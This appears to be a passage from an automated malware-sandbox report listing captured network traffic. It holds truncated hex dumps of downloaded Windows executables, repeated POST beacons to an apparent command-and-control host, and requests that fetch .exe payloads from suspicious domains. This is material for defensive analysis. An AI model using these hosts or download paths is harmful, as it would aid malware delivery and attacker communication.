00 64 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 20 dd 6e 02 00 70 0d 00 00 ce 00 00 00 02 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.20.1Date: Fri, 14 Jan 2022 11:30:13 GMTContent-Type: application/x-msdos-programContent-Length: 557664Connection: closeLast-Modified: Thu, 13 Jan 2022 19:20:04 GMTETag: "88260-5d57b92d7ebed"Accept-Ranges: bytesData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 d6 ad 35 ab 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 24 03 00 00 2a 03 00 00 00 00 00 00 b0 06 00 00 20 00 00 00 60 03 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 30 08 00 00 04 00 00 1c 40 09 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 70 03 00 e4 01 00 00 00 80 03 00 50 29 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 69 64 61 74 61 00 00 00 60 03 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 70 64 61 74 61 00 00 00 10 00 00 00 70 03 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 50 29 03 00 00 80 03 00 30 06 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 69 64 61 74 61 00 00 80 01 00 00 b0 06 00 fc 78 01 00 00 0e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 11:30:16 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 11:02:40 GMTETag: "57200-5d588bdcf8dca"Accept-Ranges: bytesContent-Length: 356864Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 fd 75 73 5a 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 12 01 00 00 5c 04 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 b0 05 00 00 04 00 00 00 00 00 00 03 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 6c 71 01 00 c8 00 00 00 00 90 01 00 e4 15 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 3c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 7e 38 00 00 00 10 00 00 00 3a 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 42 d6 00 00 00 50 00 00 00 d8 00 00 00 3e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a8 33 00 00 00 30 01 00 00 34 00 00 00 16 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 8c 17 00 00 00 70 01 00 00 12 00 00 00 4a 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e4 15 04 00 00 90 01 00 00 16 04 00 00 5c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 14 Jan 2022 11:30:18 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Fri, 07 Jan 2022 23:09:58 GMTETag: "61d8c846-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 0
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 11:30:24 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Thu, 13 Jan 2022 16:32:58 GMTETag: "6e600-5d5793d3df2ef"Accept-Ranges: bytesContent-Length: 452096Content-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 23 15 67 78 67 74 09 2b 67 74 09 2b 67 74 09 2b b4 06 0a 2a 6d 74 09 2b b4 06 0c 2a eb 74 09 2b b4 06 0d 2a 73 74 09 2b 35 01 0c 2a 41 74 09 2b 35 01 0d 2a 76 74 09 2b 35 01 0a 2a 75 74 09 2b b4 06 08 2a 64 74 09 2b 67 74 08 2b 30 74 09 2b d2 01 0c 2a 66 74 09 2b d2 01 f6 2b 66 74 09 2b 67 74 9e 2b 66 74 09 2b d2 01 0b 2a 66 74 09 2b 52 69 63 68 67 74 09 2b 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 3a 54 e0 61 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 0e 1d 00 d0 00 00 00 ec 0f 00 00 00 00 00 00 10 00 00 00 10 00 00 00 e0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 90 15 00 00 04 00 00 19 a2 03 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c ec 10 00 a4 00 00 00 00 20 0f 00 1d a2 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 4c 2d 01 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 d0 00 00 00 10 00 00 00 76 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 60 00 00 00 e0 00 00 00 2a 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 e0 0d 00 00 40 01 00 00 0a 00 00 00 a4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 72 73 72 63 00 00 00 00 b0 01 00 00 20 0f 00 00 a4 01 00 00 ae 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 10 00 00 00 d0 10 00 00 00 00 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 64 61 74 61 00 00 00 00 a0 04 00 00 e0 10 00 00 94 04 00 00 52 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 2e 61 64 61 74 61 00 00 00 10 00 00 00 80 15 00 00 00 00 00 00 e6 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                          Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Fri, 14 Jan 2022 11:30:25 GMTServer: Apache/2.4.38 (Win32) PHP/7.1.26Last-Modified: Fri, 14 Jan 2022 10:54:23 GMTETag: "246ec0-5d588a02be749"Accept-Ranges: bytesContent-Length: 2387648Content-Type: application/x-msdownloadData Raw: 4d 5a e2 15 17 e8 ec 6f ac 01 a3 67 88 27 b0 3a 07 28 33 98 08 dd 33 32 a2 e3 d0 db df 66 f6 e9 c8 9b f0 ce 43 27 42 7b 62 19 d6 e4 19 09 05 f6 16 cd 2b 9a c3 52 c6 c7 98 88 64 3a 00 01 00 00 0b 51 d1 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 ca 5e 3d 5f 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 64 3f 00 00 18 03 00 00 00 00 00 00 e0 42 00 00 20 00 00 00 a0 3f 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 44 00 00 04 00 00 6f 94 24 00 02 00 60 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 b0 3f 00 dc 01 00 00 00 c0 3f 00 14 17 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 65 64 61 74 61 00 00 00 a0 3f 00 00 10 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 2e 43 52 54 00 00 00 00 00 10 00 00 00 b0 3f 00 00 02 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 14 17 03 00 00 c0 3f 00 14 17 03 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 43 52 54 00 00 00 00 00 80 01 00 00 e0 42 00 17 79 01 00 00 1e 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rrooukv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxyqqf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 317Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dutgomfkc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qwfulsm.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 358Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rxkloxn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hopcq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ocnbwlevej.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 189Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gdffxf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 339Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psgcnvvm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 344Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vxjxd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 211Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mpabshq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 319Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ubyvpwxipt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 311Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pxnotaacu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 210Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnpyohcdyx.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 207Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://byfupx.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 141Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iijrpdo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ntsddipn.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vkaflekmve.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 186Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://seaed.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 360Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://obclg.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 289Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pgydqikexd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 252Host: host-data-coin-11.com
                          Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gminomh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
